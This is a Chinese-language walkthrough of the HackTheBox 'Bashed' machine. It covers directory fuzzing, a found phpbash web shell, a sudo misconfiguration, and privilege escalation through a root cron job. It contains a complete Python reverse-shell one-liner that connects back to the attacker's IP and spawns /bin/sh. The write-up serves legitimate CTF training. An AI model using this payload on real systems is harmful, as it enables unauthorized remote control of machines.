**
HackTheBox-Linux-Bashed-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/118
靶机难度:初级(4.5/10)
靶机发布日期:2017年12月20日
靶机描述:
Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files. As basic access to the crontab is restricted,
作者:大余
时间:2020-06-04
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.68…
发现只开放了80端口…
浏览web直接跳过…
直接爆破目录…
Dirbuster发现了dev目录,其中包含phpbash脚本…
phpbash是个反向外壳…去看看
直接利用反向外壳,文件上传提权即可…
上传php简单shell,获得了低权外壳…
通过低权外壳,获得了user_flag信息…
sudo -l发现all,无需任何密码可以直接bash到scriptmanager用户…
sudo -u 获得了scriptmanager用户权限…
枚举时发现scripts底层存在test文件脚本信息…
查看test.py文件信息,发现test.py每分钟执行一次,这可以通过阅读test.py并查看test.txt的时间戳来推断,该文本文件由root拥有,因为root.txt是root权限执行…
只需要修改test.py即可提权…
简单python_shell…
命令:import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.51",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
等待一分钟后,自动提权root…获得了root_flag信息…
由于我们已经成功得到root权限查看user和root.txt,因此完成这台初级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
